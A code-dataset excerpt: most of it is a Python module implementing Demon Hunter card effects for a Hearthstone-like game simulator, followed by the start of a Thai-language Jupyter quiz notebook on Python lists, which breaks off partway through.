self.Game.trigsBoard[self.ID][\"FinalDmgonHero?\"].append(self)\n\t\texcept: self.Game.trigsBoard[self.ID][\"FinalDmgonHero?\"] = [self]\n\t\tself.Game.turnEndTrigger.append(self)\n\t\t\n\tdef disconnect(self):\n\t\ttry: self.Game.trigsBoard[self.ID][\"FinalDmgonHero?\"].remove(self)\n\t\texcept: pass\n\t\ttry: self.Game.turnEndTrigger.remove(self)\n\t\texcept: pass\n\t\t#number here is a list that holds the damage to be processed\n\tdef canTrigger(self, signal, ID, subject, target, number, comment, choice=0):\n\t\treturn target.ID == self.ID and target.onBoard\n\t\t\n\tdef trigger(self, signal, ID, subject, target, number, comment, choice=0):\n\t\tif self.canTrigger(signal, ID, subject, target, number, comment):\n\t\t\tif self.Game.GUI: self.Game.GUI.showOffBoardTrig(Blur(self.Game, self.ID), linger=False)\n\t\t\tself.effect(signal, ID, subject, target, number, comment)\n\t\t\t\n\tdef effect(self, signal, ID, subject, target, number, comment, choice=0):\n\t\tnumber[0] = 0\n\t\t\n\tdef turnEndTrigger(self):\n\t\tself.disconnect()\n\t\t\n\tdef createCopy(self, game): #不是纯的只在回合结束时触发,需要完整的createCopy\n\t\tif self not in game.copiedObjs: #这个扳机没有被复制过\n\t\t\ttrigCopy = type(self)(game, self.ID)\n\t\t\tgame.copiedObjs[self] = trigCopy\n\t\t\treturn trigCopy\n\t\telse: #一个扳机被复制过了,则其携带者也被复制过了\n\t\t\treturn game.copiedObjs[self]\n\t\t\t\n\t\t\t\nclass TwinSlice(Spell):\n\tClass, name = \"Demon Hunter\", \"Twin Slice\"\n\trequireTarget, mana = False, 1\n\tindex = \"DHInitiate~Demon Hunter~Spell~1~Twin Slice\"\n\tdescription = \"Give your hero +2 Attack this turn. Add 'Second Slice' to your hand\"\n\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tself.Game.heroes[self.ID].gainAttack(2)\n\t\tself.Game.Hand_Deck.addCardtoHand(SecondSlice(self.Game, self.ID), self.ID)\n\t\treturn None\n\t\t\nclass SecondSlice(Spell):\n\tClass, name = \"Demon Hunter\", \"Second Slice\"\n\trequireTarget, mana = False, 1\n\tindex = \"DHInitiate~Demon Hunter~Spell~1~Second Slice~Uncollectible\"\n\tdescription = \"Give your hero +2 Attack this turn\"\n\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tself.Game.heroes[self.ID].gainAttack(2)\n\t\treturn None\n\t\t\n\t\t\n\"\"\"Mana 1 cards\"\"\"\nclass Battlefiend(Minion):\n\tClass, race, name = \"Demon Hunter\", \"Demon\", \"Battlefiend\"\n\tmana, attack, health = 1, 1, 2\n\tindex = \"DHInitiate~Demon Hunter~Minion~1~1~2~Demon~Battlefiend\"\n\trequireTarget, keyWord, description = False, \"\", \"After your hero attacks, gain +1 Attack\"\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID)\n\t\tself.trigsBoard = [Trig_Battlefiend(self)]\n\t\t\nclass Trig_Battlefiend(TrigBoard):\n\tdef __init__(self, entity):\n\t\tself.blank_init(entity, [\"HeroAttackedMinion\", \"HeroAttackedHero\"])\n\t\t\n\tdef canTrigger(self, signal, ID, subject, target, number, comment, choice=0):\n\t\treturn self.entity.onBoard and subject == self.entity.Game.heroes[self.entity.ID]\n\t\t\n\tdef text(self, CHN):\n\t\treturn \"在你的英雄攻击后,获得+1攻击力\" if CHN else \"After your hero attacks, gain +1 Attack\"\n\t\t\n\tdef effect(self, signal, ID, subject, target, number, comment, choice=0):\n\t\tself.entity.buffDebuff(1, 0)\n\t\t\n\t\t\nclass ConsumeMagic(Spell):\n\tClass, name = \"Demon Hunter\", \"Consume Magic\"\n\trequireTarget, mana = True, 1\n\tindex = \"DHInitiate~Demon Hunter~Spell~1~Consume Magic~Outcast\"\n\tdescription = \"Silence an enemy minion. Outcast: Draw a card\"\n\tdef available(self):\n\t\treturn self.selectableEnemyMinionExists()\n\t\t\n\tdef targetCorrect(self, target, choice=0):\n\t\treturn target.type == \"Minion\" and target.ID != self.ID and target.onBoard\n\t\t\n\tdef effectCanTrigger(self):\n\t\tself.effectViable = self.Game.Hand_Deck.outcastcanTrigger(self)\n\t\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tif target:\n\t\t\ttarget.getsSilenced()\n\t\tif posinHand == 0 or posinHand == -1:\n\t\t\tself.Game.Hand_Deck.drawCard(self.ID)\n\t\treturn target\n\t\t\n\t\t\nclass ManaBurn(Spell):\n\tClass, name = \"Demon Hunter\", \"Mana Burn\"\n\trequireTarget, mana = False, 1\n\tindex = \"DHInitiate~Demon Hunter~Spell~1~Mana Burn\"\n\tdescription = \"Your opponent has 2 fewer Mana Crystals next turn\"\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tself.Game.Manas.manas_withheld[3-self.ID] += 2\n\t\tself.Game.turnStartTrigger.append(TwoFewerManaEffectRemoved(self.Game, 3-self.ID))\n\t\treturn None\n\t\t\n#不知道这个少两个法力水晶是让它们空两个还是直接少真实的水晶\nclass TwoFewerManaEffectRemoved:\n\tdef __init__(self, Game, ID):\n\t\tself.Game, self.ID = Game, ID\n\t\t\n\tdef text(self, CHN):\n\t\treturn \"玩家%d的下个回合减少2个法力水晶\"%self.ID if CHN \\\n\t\t\t\telse \"Player %d's next turn has 2 fewer Mana Crystals\"%self.ID\n\t\t\t\t\n\tdef turnStartTrigger(self):\n\t\tself.Game.Manas.manas_withheld[self.ID] -= 2\n\t\ttry: self.Game.turnStartTrigger.remove(self)\n\t\texcept: pass\n\t\t\n\tdef createCopy(self, game):\n\t\treturn type(self)(game, self.ID)\n\t\t\n\t\t\nclass UrzulHorror(Minion):\n\tClass, race, name = \"Demon Hunter\", \"Demon\", \"Ur'zul Horror\"\n\tmana, attack, health = 1, 2, 1\n\tindex = \"DHInitiate~Demon Hunter~Minion~1~2~1~Demon~Ur'zul Horror~Deathrattle\"\n\trequireTarget, keyWord, description = False, \"\", \"Deathrattle: Add a 2/1 Lost Soul to your hand\"\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID)\n\t\tself.deathrattles = [AddaLostSoultoYourHand(self)]\n\t\t\nclass AddaLostSoultoYourHand(Deathrattle_Minion):\n\tdef effect(self, signal, ID, subject, target, number, comment, choice=0):\n\t\tself.entity.Game.Hand_Deck.addCardtoHand(LostSoul, self.entity.ID, \"type\")\n\t\t\n\tdef text(self, CHN):\n\t\treturn \"亡语:将一张2/1的“迷失之魂”置入你的手牌\" if CHN else \"Deathrattle: Add a 2/1 Lost Soul to your hand\"\n\t\t\nclass LostSoul(Minion):\n\tClass, race, name = \"Demon Hunter\", \"\", \"Lost Soul\"\n\tmana, attack, health = 1, 2, 1\n\tindex = \"DHInitiate~Demon Hunter~Minion~1~2~1~None~Lost Soul~Uncollectible\"\n\trequireTarget, keyWord, description = False, \"\", \"\"\n\t\n\t\n\"\"\"Mana 2 cards\"\"\"\nclass BladeDance(Spell):\n\tClass, name = \"Demon Hunter\", \"Blade Dance\"\n\trequireTarget, mana = False, 2\n\tindex = \"DHInitiate~Demon Hunter~Spell~2~Blade Dance\"\n\tdescription = \"Deal damage equal to your hero's Attack to 3 random enemy minions\"\n\tdef available(self):\n\t\treturn self.Game.heroes[self.ID].attack > 0\n\t\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tdamage = (self.Game.heroes[self.ID].attack + self.countSpellDamage()) * (2 ** self.countDamageDouble())\n\t\tcurGame = self.Game\n\t\tminions = curGame.minionsAlive(3-self.ID)\n\t\tif damage > 0 and minions:\n\t\t\tif curGame.mode == 0:\n\t\t\t\tif curGame.guides:\n\t\t\t\t\tminions = [curGame.minions[3-self.ID][i] for i in curGame.guides.pop(0)]\n\t\t\t\telse:\n\t\t\t\t\tminions = list(npchoice(minions, min(3, len(minions)), replace=False))\n\t\t\t\t\tcurGame.fixedGuides.append(tuple([minion.pos for minion in minions]))\n\t\t\t\tself.dealsAOE(minions, [damage]*len(minions))\n\t\treturn None\n\t\t\n\t\t\nclass FeastofSouls(Spell):\n\tClass, name = \"Demon Hunter\", \"Feast of Souls\"\n\trequireTarget, mana = False, 2\n\tindex = \"DHInitiate~Demon Hunter~Spell~2~Feast of Souls\"\n\tdescription = \"Draw a card for each friendly minion that died this turn\"\n\tdef effectCanTrigger(self):\n\t\tself.effectViable = self.Game.Counters.minionsDiedThisTurn[self.ID] != []\n\t\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tnum = len(self.Game.Counters.minionsDiedThisTurn[self.ID])\n\t\tfor i in range(num): self.Game.Hand_Deck.drawCard(self.ID)\n\t\treturn None\n\t\t\n\t\t\nclass Umberwing(Weapon):\n\tClass, name, description = \"Demon Hunter\", \"Umberwing\", \"Battlecry: Summon two 1/1 Felwings\"\n\tmana, attack, durability = 2, 1, 2\n\tindex = \"DHInitiate~Demon Hunter~Weapon~2~1~2~Umberwing~Battlecry\"\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tself.Game.summon([Felwing(self.Game, self.ID) for i in range(2)], (-1, \"totheRightEnd\"), self.ID)\n\t\treturn None\n\t\t\nclass Felwing(Minion):\n\tClass, race, name = \"Demon Hunter\", \"Demon\", \"Felwing\"\n\tmana, attack, health = 1, 1, 1\n\tindex = \"DHInitiate~Demon Hunter~Minion~1~1~1~Demon~Felwing~Uncollectible\"\n\trequireTarget, keyWord, description = False, \"\", \"\"\n\t\n\t\n\"\"\"Mana 3 cards\"\"\"\nclass AltruistheOutcast(Minion):\n\tClass, race, name = \"Demon Hunter\", \"\", \"Altruis the Outcast\"\n\tmana, attack, health = 4, 4, 2\n\tindex = \"DHInitiate~Demon Hunter~Minion~4~4~2~None~Altruis the Outcast~Legendary\"\n\trequireTarget, keyWord, description = False, \"\", \"After you play the left- or right-most card in your hand, deal 1 damage to all enemies\"\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID)\n\t\tself.trigsBoard = [Trig_AltruistheOutcast(self)]\n\t\t\nclass Trig_AltruistheOutcast(TrigBoard):\n\tdef __init__(self, entity):\n\t\tself.blank_init(entity, [\"MinionBeenPlayed\", \"SpellBeenPlayed\", \"WeaponBeenPlayed\", \"HeroCardBeenPlayed\"])\n\t\t\n\t#The comment passed is the position of card in hand when they are played.\n\tdef canTrigger(self, signal, ID, subject, target, number, comment, choice=0):\n\t\treturn self.entity.onBoard and subject.ID == self.entity.ID and subject != self.entity and (comment == -1 or comment == 0)\n\t\t\n\tdef text(self, CHN):\n\t\treturn \"在你使用最左或最右的一张手牌后,对所有敌人造成1点伤害\" if CHN \\\n\t\t\t\telse \"After you play the left- or right-most card in your hand, deal 1 damage to all enemies\"\n\t\t\t\t\n\tdef effect(self, signal, ID, subject, target, number, comment, choice=0):\n\t\ttargets = [self.entity.Game.heroes[3-self.entity.ID]] + self.entity.Game.minionsonBoard(3-self.entity.ID)\n\t\tself.entity.dealsAOE(targets, [1 for enemy in targets])\n\t\t\n\t\t\nclass EyeBeam(Spell):\n\tClass, name = \"Demon Hunter\", \"Eye Beam\"\n\trequireTarget, mana = True, 3\n\tindex = \"DHInitiate~Demon Hunter~Spell~3~Eye Beam~Outcast\"\n\tdescription = \"Lifesteal. Deal 3 damage to a minion. Outcast: This costs (1)\"\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID)\n\t\tself.keyWords[\"Lifesteal\"] = 1\n\t\tself.trigsHand = [Trig_EyeBeam(self)]\n\t\t\n\tdef available(self):\n\t\treturn self.selectableMinionExists()\n\t\t\n\tdef targetCorrect(self, target, choice=0):\n\t\treturn target.type == \"Minion\" and target.onBoard\n\t\t\n\tdef effectCanTrigger(self):\n\t\tself.effectViable = self.Game.Hand_Deck.outcastcanTrigger(self)\n\t\t\n\tdef selfManaChange(self):\n\t\tif self.inHand:\n\t\t\tposinHand = self.Game.Hand_Deck.hands[self.ID].index(self)\n\t\t\tif posinHand == 0 or posinHand == len(self.Game.Hand_Deck.hands[self.ID]) - 1:\n\t\t\t\tself.mana = 1\n\t\t\t\t\n\tdef text(self, CHN):\n\t\tdamage = (3 + self.countSpellDamage()) * (2 ** self.countDamageDouble())\n\t\treturn \"吸血。对一个随从造成%d点伤害。流放:法力值消耗为(1)点\"%damage if CHN \\\n\t\t\t\telse \"Lifesteal. Deal %d damage to a minion. Outcast: This costs (1)\"%damage\n\t\t\t\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tif target:\n\t\t\tdamage = (3 + self.countSpellDamage()) * (2 ** self.countDamageDouble())\n\t\t\tself.dealsDamage(target, damage)\n\t\treturn target\n\t\t\nclass Trig_EyeBeam(TrigHand):\n\tdef __init__(self, entity):\n\t\tself.blank_init(entity, [\"CardLeavesHand\", \"CardEntersHand\"])\n\t\t\n\tdef canTrigger(self, signal, ID, subject, target, number, comment, choice=0):\n\t\tif self.entity.inHand:\n\t\t\tcard = target[0] if signal == \"CardEntersHand\" else target\n\t\t\treturn card.ID == self.entity.ID\n\t\treturn False\n\t\t\n\tdef effect(self, signal, ID, subject, target, number, comment, choice=0):\n\t\tself.entity.Game.Manas.calcMana_Single(self.entity)\n\t\t\n\t\t\nclass WrathscaleNaga(Minion):\n\tClass, race, name = \"Demon Hunter\", \"\", \"Wrathscale Naga\"\n\tmana, attack, health = 3, 3, 1\n\tindex = \"DHInitiate~Demon Hunter~Minion~3~3~1~None~Wrathscale Naga\"\n\trequireTarget, keyWord, description = False, \"\", \"After a friendly minion dies, deal 3 damage to a random enemy\"\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID)\n\t\tself.trigsBoard = [Trig_WrathscaleNaga(self)]\n\t\t\nclass Trig_WrathscaleNaga(TrigBoard):\n\tdef __init__(self, entity):\n\t\tself.blank_init(entity, [\"MinionDied\"])\n\t\t\n\tdef canTrigger(self, signal, ID, subject, target, number, comment, choice=0):\n\t\treturn self.entity.onBoard and target != self.entity and target.ID == self.entity.ID #Technically, minion has to disappear before dies. But just in case.\n\t\t\n\tdef text(self, CHN):\n\t\treturn \"在一个友方随从死亡后,随从对一个敌人造成3点伤害\" if CHN else \"After a friendly minion dies, deal 3 damage to a random enemy\"\n\t\t\n\tdef effect(self, signal, ID, subject, target, number, comment, choice=0):\n\t\tcurGame = self.entity.Game\n\t\tif curGame.mode == 0:\n\t\t\tenemy = None\n\t\t\tif curGame.guides:\n\t\t\t\ti, where = curGame.guides.pop(0)\n\t\t\t\tif where: enemy = curGame.find(i, where)\n\t\t\telse:\n\t\t\t\ttargets = curGame.charsAlive(3-self.entity.ID)\n\t\t\t\tif targets:\n\t\t\t\t\tenemy = npchoice(targets)\n\t\t\t\t\tcurGame.fixedGuides.append((enemy.pos, enemy.type+str(enemy.ID)))\n\t\t\t\telse: curGame.fixedGuides.append((0, \"\"))\n\t\t\tif enemy:\n\t\t\t\tself.entity.dealsDamage(enemy, 1)\n\t\t\t\t\n\"\"\"Mana 4 cards\"\"\"\nclass IllidariFelblade(Minion):\n\tClass, race, name = \"Demon Hunter\", \"\", \"Illidari Felblade\"\n\tmana, attack, health = 4, 5, 3\n\tindex = \"DHInitiate~Demon Hunter~Minion~4~5~3~None~Illidari Felblade~Rush~Outcast\"\n\trequireTarget, keyWord, description = False, \"Rush\", \"Rush. Outcast: Gain Immune this turn\"\n\t\n\tdef effectCanTrigger(self):\n\t\tself.effectViable = self.Game.Hand_Deck.outcastcanTrigger(self)\n\t\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tif posinHand == 0 or posinHand == -1:\n\t\t\tself.status[\"Immune\"] = 1\n\t\treturn None\n\t\t\n\t\t\nclass RagingFelscreamer(Minion):\n\tClass, race, name = \"Demon Hunter\", \"\", \"Raging Felscreamer\"\n\tmana, attack, health = 4, 4, 4\n\tindex = \"DHInitiate~Demon Hunter~Minion~4~4~4~None~Raging Felscreamer~Battlecry\"\n\trequireTarget, keyWord, description = False, \"\", \"Battlecry: The next Demon you play costs (2) less\"\n\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\ttempAura = YourNextDemonCosts2Less(self.Game, self.ID)\n\t\tself.Game.Manas.CardAuras.append(tempAura)\n\t\ttempAura.auraAppears()\n\t\treturn None\n\t\t\nclass YourNextDemonCosts2Less(TempManaEffect):\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID, -2, -1)\n\t\tself.temporary = False #不会在回合结束后消失,直到那个恶魔被打出为止\n\t\tself.auraAffected = []\n\t\t\n\tdef applicable(self, target):\n\t\treturn target.ID == self.ID and target.type == \"Minion\" and \"Demon\" in target.race\n\t\t\n\tdef selfCopy(self, game):\n\t\treturn type(self)(game, self.ID)\n\t\t\n\t\t\nclass SoulSplit(Spell):\n\tClass, name = \"Demon Hunter\", \"Soul Split\"\n\trequireTarget, mana = True, 4\n\tindex = \"DHInitiate~Demon Hunter~Spell~4~Soul Split\"\n\tdescription = \"Choose a friendly Demon. Summon a copy of it\"\n\t\n\tdef available(self):\n\t\treturn self.selectableFriendlyMinionExists()\n\t\t\n\tdef targetCorrect(self, target, choice=0):\n\t\treturn target.type == \"Minion\" and \"Demon\" in target.race and target.ID == self.ID and target.onBoard\n\t\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tif target and self.Game.space(self.ID) > 0:\n\t\t\tCopy = target.selfCopy(self.ID) if target.onBoard else type(target)(self.Game, self.ID)\n\t\t\tself.Game.summon(Copy, target.pos+1, self.ID)\n\t\treturn target\n\t\t\n\"\"\"Mana 5 cards\"\"\"\nclass CommandtheIllidari(Spell):\n\tClass, name = \"Demon Hunter\", \"Command the Illidari\"\n\trequireTarget, mana = False, 5\n\tindex = \"DHInitiate~Demon Hunter~Spell~5~Command the Illidari\"\n\tdescription = \"Summon six 1/1 Illidari with Rush\"\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tself.Game.summon([IllidariInitiate(self.Game, self.ID) for i in range(6)], (-1, \"totheRightEnd\"), self.ID)\n\t\treturn None\n\t\t\nclass WrathspikeBrute(Minion):\n\tClass, race, name = \"Demon Hunter\", \"Demon\", \"Wrathspike Brute\"\n\tmana, attack, health = 5, 2, 6\n\tindex = \"DHInitiate~Demon Hunter~Minion~5~2~6~Demon~Wrathspike Brute~Taunt\"\n\trequireTarget, keyWord, description = False, \"Taunt\", \"Taunt. After this is attacked, deal 1 damage to all enemies\"\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID)\n\t\tself.trigsBoard = [Trig_WrathspikeBrute(self)]\n\t\t\nclass Trig_WrathspikeBrute(TrigBoard):\n\tdef __init__(self, entity):\n\t\tself.blank_init(entity, [\"MinionAttackedMinion\", \"HeroAttackedMinion\"])\n\t\t\n\tdef canTrigger(self, signal, ID, subject, target, number, comment, choice=0):\n\t\treturn self.entity.onBoard and target == self.entity\n\t\t\n\tdef text(self, CHN):\n\t\treturn \"在该随从被攻击后,对所有敌人造成1点伤害\" if CHN else \"After this is attacked, deal 1 damage to all enemies\"\n\t\t\n\tdef effect(self, signal, ID, subject, target, number, comment, choice=0):\n\t\ttargets = [self.entity.Game.heroes[3-self.entity.ID]] + self.entity.Game.minionsonBoard(3-self.entity.ID)\n\t\tself.entity.dealsAOE(targets, [1 for minion in targets])\n\t\t\n\"\"\"Mana 7 cards\"\"\"\nclass Flamereaper(Weapon):\n\tClass, name, description = \"Demon Hunter\", \"Flamereaper\", \"Also damages the minions next to whomever your hero attacks\"\n\tmana, attack, durability = 7, 4 ,3\n\tindex = \"DHInitiate~Demon Hunter~Weapon~7~4~3~Flamereaper\"\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID)\n\t\tself.marks[\"Sweep\"] = 1\n\t\t\n\"\"\"Mana 8 cards\"\"\"\nclass HulkingOverfiend(Minion):\n\tClass, race, name = \"Demon Hunter\", \"Demon\", \"Hulking Overfiend\"\n\tmana, attack, health = 8, 5, 10\n\tindex = \"DHInitiate~Demon Hunter~Minion~8~5~10~Demon~Hulking Overfiend~Rush\"\n\trequireTarget, keyWord, description = False, \"Rush\", \"Rush. After this attacks and kills a minion, it may attack again\"\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID)\n\t\tself.trigsBoard = [Trig_HulkingOverfiend(self)]\n\t\t\nclass Trig_HulkingOverfiend(TrigBoard):\n\tdef __init__(self, entity):\n\t\tself.blank_init(entity, [\"MinionAttackedMinion\"])\n\t\t\n\tdef canTrigger(self, signal, ID, subject, target, number, comment, choice=0):\n\t\treturn self.entity.onBoard and subject == self.entity and self.entity.health > 0 \\\n\t\t\t\tand self.entity.dead == False and (target.health < 1 or target.dead == True)\n\t\t\t\t\n\tdef text(self, CHN):\n\t\treturn \"在该随从攻击并消灭一个随从后,可再次攻击\" if CHN \\\n\t\t\t\telse \"After this attacks and kills a minion, it may attack again\"\n\t\t\t\t\n\tdef effect(self, signal, ID, subject, target, number, comment, choice=0):\n\t\tself.entity.attChances_extra += 1\n\t\t\n\t\t\nclass Nethrandamus(Minion):\n\tClass, race, name = \"Demon Hunter\", \"Dragon\", \"Nethrandamus\"\n\tmana, attack, health = 9, 8, 8\n\tindex = \"DHInitiate~Demon Hunter~Minion~9~8~8~Dragon~Nethrandamus~Battlecry~Legendary\"\n\trequireTarget, keyWord, description = False, \"\", \"Battlecry: Summon two random 0-Cost minions. (Upgrades each time a friendly minion dies!)\"\n\tpoolIdentifier = \"0-Cost Minions to Summon\"\n\t@classmethod\n\tdef generatePool(cls, Game):\n\t\treturn [\"%d-Cost Minions to Summon\"%cost for cost in Game.MinionsofCost.keys()], \\\n\t\t\t\t[list(Game.MinionsofCost[cost].values()) for cost in Game.MinionsofCost.keys()]\n\t\t\t\t\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID)\n\t\tself.trigsHand = [Trig_Nethrandamus(self)] #只有在手牌中才会升级\n\t\tself.progress = 0\n\t\t\n\tdef text(self, CHN):\n\t\treturn \"战吼:随机召唤两个法力值消耗为(%d)的随从\"%self.progress if CHN \\\n\t\t\t\telse \"Battlecry: Summon two random %d-Cost minions\"%self.progress\n\t\t\t\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tcurGame = self.Game\n\t\tif curGame.mode == 0:\n\t\t\tif curGame.guides:\n\t\t\t\tminions = curGame.guides.pop(0)\n\t\t\telse:\n\t\t\t\tcost = self.progress\n\t\t\t\twhile cost not in curGame.MinionsofCost: #假设计数过高,超出了费用范围,则取最高的可选费用\n\t\t\t\t\tcost -= 1\n\t\t\t\tminions = npchoice(self.rngPool(\"%d-Cost Minions to Summon\"%cost), 2, replace=False)\n\t\t\t\tcurGame.fixedGuides.append(tuple(minions))\n\t\t\tpos = (self.pos, \"leftandRight\") if self.onBoard else (-1, \"totheRightEnd\")\n\t\t\tcurGame.summon([minion(curGame, self.ID) for minion in minions], pos, self.ID)\n\t\treturn None\n\t\t\nclass Trig_Nethrandamus(TrigHand):\n\tdef __init__(self, entity):\n\t\tself.blank_init(entity, [\"MinionDies\"])\n\t\t\n\tdef canTrigger(self, signal, ID, subject, target, number, comment, choice=0):\n\t\treturn self.entity.inHand and target.ID == self.entity.ID\n\t\t\n\tdef text(self, CHN):\n\t\treturn \"该随从在手牌中时,每有一个友方随从死亡便升级\" if CHN \\\n\t\t\t\telse \"Upgrades in hand each time a friendly minions dies\"\n\t\t\t\t\n\tdef effect(self, signal, ID, subject, target, number, comment, choice=0):\n\t\tself.entity.progress += 1\n\t\t\n\t\t\nDemonHunterInit_Indices = {\"DHInitiate~Demon Hunter~Spell~0~Blur\": Blur,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Spell~1~Twin Slice\": TwinSlice,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Spell~1~Second Slice~Uncollectible\": SecondSlice,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~1~1~2~Demon~Battlefiend\": Battlefiend,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Spell~1~Consume Magic~Outcast\": ConsumeMagic,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Spell~1~Mana Burn\": ManaBurn,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~1~2~1~Demon~Ur'zul Horror~Deathrattle\": UrzulHorror,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~1~2~1~None~Lost Soul~Uncollectible\": LostSoul,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Spell~2~Blade Dance\": BladeDance,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Spell~2~Feast of Souls\": FeastofSouls,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Weapon~2~1~2~Umberwing~Battlecry\": Umberwing,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~1~1~1~Demon~Felwing~Uncollectible\": Felwing,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~4~4~2~None~Altruis the Outcast~Legendary\": AltruistheOutcast,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Spell~3~Eye Beam~Outcast\": EyeBeam,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~3~3~1~None~Wrathscale Naga\": WrathscaleNaga,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~4~5~3~None~Illidari Felblade~Rush~Outcast\": IllidariFelblade,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~4~4~4~None~Raging Felscreamer~Battlecry\": RagingFelscreamer,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Spell~4~Soul Split\": SoulSplit,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Spell~5~Command the Illidari\": CommandtheIllidari,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~5~2~6~Demon~Wrathspike Brute~Taunt\": WrathspikeBrute,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Weapon~7~4~3~Flamereaper\": Flamereaper,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~8~5~10~Demon~Hulking Overfiend~Rush\": HulkingOverfiend,\n\t\t\t\t\t\t\t\"DHInitiate~Demon Hunter~Minion~9~8~8~Dragon~Nethrandamus~Battlecry~Legendary\": Nethrandamus,\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\n#The images/crops were initially in the Shadows folder. This is for batch moving the files.\n#if __name__ == \"__main__\":\n#\tfilename_List = []\n#\tfor key, value in DemonHunterInit_Indices.items():\n#\t\tfilename_List.append(value.__name__+\".png\")\n#\t\t\n#\tprint(filename_List)","sub_path":"DemonHunterInitiate.py","file_name":"DemonHunterInitiate.py","file_ext":"py","file_size_in_byte":23305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"378957769","text":"\n# coding: utf-8\n\n# # CPE-341, Quiz 2/2015 - Question Set A2\n# \n# - Iteration Design Pattern : List, Dictionary\n# - Using Class Die in a List\n\n# In[1]:\n\nget_ipython().magic('reload_ext load_style')\nget_ipython().magic('load_style talk.css')\n\n\n# In[20]:\n\n## รหัสประจำตัวนักศึกษา :\n## ชื่อนักศึกษา\n##\n## คลิก Run cell นี้เพียงครั้งเดียว\n##\n##\nimport datetime\ndatetime.datetime.now().isoformat()\n\n\n# ## Question 1 ( @2 pt x 2 = 4 pts )\n# \n# ### Q1.a \n# จงเขียนคำสั่ง เพื่อพิมพ์ค่าตัวเลขด้วย index ที่กำหนดให้ใน list `mynums` ต่อไปนี้ \n\n# In[3]:\n\n## ไม่แก้ไขข้อมูลใน cell นี้\n\nmynums = [-5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5]\n\n\n# In[4]:\n\n## ANSWER Q1.a\n##\n##\nindex = 6 \n\n\n\n\n# ### Q1.b \n# จงเขียนคำสั่ง เพื่อพิมพ์ตัวเลขที่มีค่าน้อยกว่า 1 จาก list `mynums` ในข้อ (1.a)\n\n# In[5]:\n\n## ANSWER Q1.b\n##\n\n\n\n\n# In[ ]:\n\n\n\n\n# ## Question 2 ( @3 pts x 4 = 12 pts )\n# \n# ### Q2.a \n# จงสร้าง **list** เพื่อเก็บข้อมูลตัวเลขคี่ -13 ถึง 13 โดยใข้ `range`\n\n# In[6]:\n\n## ANSWER Q2.a\n##\n\n\n\n# ### Q2.b \n# จงสร้าง **list** เพื่อเก็บตัวเลขสุ่มในช่วง 1-12 จำนวน 20 ตัวเลข โดยใข้ฟังก์ชั่น `randint` จากไลบรารี `random`\n\n# In[7]:\n\n## ANSWER Q2.b\n##\nfrom random import randint \n\n\n\n\n# In[ ]:\n\n\n\n\n# ### Q2.c \n# จงหาผลรวมของ **list** ต่อไปนี้แล้วเก็บไว้ที่ตัวแปรชื่อ myTotal โดยใข้ฟังก์ชั่น `sum`\n# \n# ```\n# myTest = [-38, 72, -33, 18, 96, -83, 57, 41]\n# ```\n\n# In[8]:\n\n## ANSWER Q1.c\n##\n\n\n\n\n# In[ ]:\n\n\n\n\n# ### Q2.d \n# จงเขียน `def` ชื่อ `average` สำหรับหาค่าเฉี่ยของตัวเลขใน **list** `numbers` ที่เป็น argument \n# \n# เช่น เมื่อเรียกใช้ `average()` จะได้ผลลัพธ์ดังงนี้\n# \n# **Hint:**__ ใช้ฟังก์ชัน `sum` และ `len` เพื่อหาค่าเฉลี่ย\n\n# In[9]:\n\n# 